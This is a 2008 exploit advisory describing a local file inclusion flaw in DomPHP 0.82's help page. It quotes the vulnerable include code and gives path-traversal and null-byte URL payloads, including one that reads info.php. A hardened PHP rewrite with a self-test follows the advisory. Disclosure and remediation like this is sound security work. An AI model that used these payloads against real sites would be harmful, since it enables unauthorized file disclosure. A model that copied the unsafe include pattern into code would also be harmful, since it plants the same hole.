DomPHP 0.82 index.php page Local File Inclusion Vulnerability

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team

= Script : DomPHP 0.82
= Download : http://www.domphp.com/download/

= BUG : Local File Inclusion

= Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
    // Strip http:// in case of a fraud attempt.
    $page = str_replace("http://","",$_GET['page']);
    include("../aides/".$page.".html");
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

= Exploit :
http://Target/[path]/aides/index.php?page=[LFI]%00

= Get phpinfo => http://Target/[path]/info.php
http://Target/[path]/aides/index.php?page=../info.php%00

# milw0rm.com [2008-02-09]
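
A hardened form of the include shown above, as an added example that is not part of the original advisory or of DomPHP. The str_replace() filter only removes "http://", so "../" passes through and the %00 in the advisory's URLs cuts off the appended ".html" on PHP builds that do not reject NUL bytes in paths; the version below allowlists the page name and checks the canonical path instead. The helper name resolve_help_page(), PHP >= 7.1, and the help pages sitting beside the script are assumptions.

```php
<?php
// Added example, not DomPHP code: hardened form of the include in
// /aides/index.php. resolve_help_page() is a hypothetical helper name.
// Assumes PHP >= 7.1 and that the .html help pages sit beside this script.

function resolve_help_page($page, string $baseDir): ?string
{
    // Allowlist the page name: letters, digits, '_' and '-' only. One rule
    // rejects '/', '\', '.', NUL bytes, URL schemes and array parameters,
    // instead of stripping a single substring as str_replace() did.
    if (!is_string($page) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page) !== 1) {
        return null;
    }

    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.html');
    if ($base === false || $file === false) {
        return null; // directory or page does not exist
    }

    // Defence in depth: the canonical path must still be inside $baseDir,
    // which also catches a symlinked page pointing somewhere else.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs for a quick self-check from the command line.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'aides_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'install.html', '<p>help</p>');
    foreach (['install', '../info.php' . "\0", 'http://x/y', 'missing', ['a']] as $in) {
        $out = resolve_help_page($in, $dir);
        echo json_encode($in), ' => ', $out === null ? 'rejected' : 'served', "\n";
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'install.html');
    rmdir($dir);
} elseif (isset($_GET['page'])) {
    $file = resolve_help_page($_GET['page'], __DIR__);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown help page');
    }
    include $file;
}
```

Run from the command line, only the constructed "install" page is served; the traversal string from the advisory, the URL, the missing page and the array value are all rejected before any include happens.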